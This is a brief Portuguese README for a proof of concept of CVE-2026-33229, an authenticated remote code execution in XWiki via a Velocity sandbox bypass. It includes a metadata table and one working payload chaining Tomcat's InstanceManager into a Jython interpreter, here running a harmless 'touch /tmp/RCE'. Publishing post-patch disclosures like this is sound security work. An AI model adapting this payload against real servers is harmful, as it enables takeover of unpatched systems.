
Prova de conceito de exploit para CVE-2026-33229, uma RCE no XWiki por meio de bypass de sandbox do Apache Velocity, com detalhes técnicos e um payload funcional.
Uma vulnerabilidade de Execução Remota de Código na Plataforma XWiki que permite a um usuário autenticado com permissões de script contornar completamente o sandbox do Apache Velocity — sem necessidade de Reflection em Java — percorrendo objetos pré-instanciados já presentes no contexto do Velocity.
📄 Detalhes técnicos completos: youssefazefzaf.com/posts/cve
| Campo | Valor |
|---|
| ID do CVE | CVE-2026-33229 |
| Produto afetado | Plataforma XWiki |
| Componente | Renderizador de macro Velocity, parâmetro de título da página |
| Privilégios necessários | Autenticado + permissão de Script |
| Impacto | Execução Remota de Código |
| GHSA | GHSA-h259-74h5-4rh9 |
| Descoberta | 7 de novembro de 2025 |
| Corrigida | 10 de dezembro de 2025 |
| Divulgada | 8 de abril de 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Aviso de divulgação responsável: PoC publicada após a disponibilidade do patch. Não use contra sistemas que você não possui.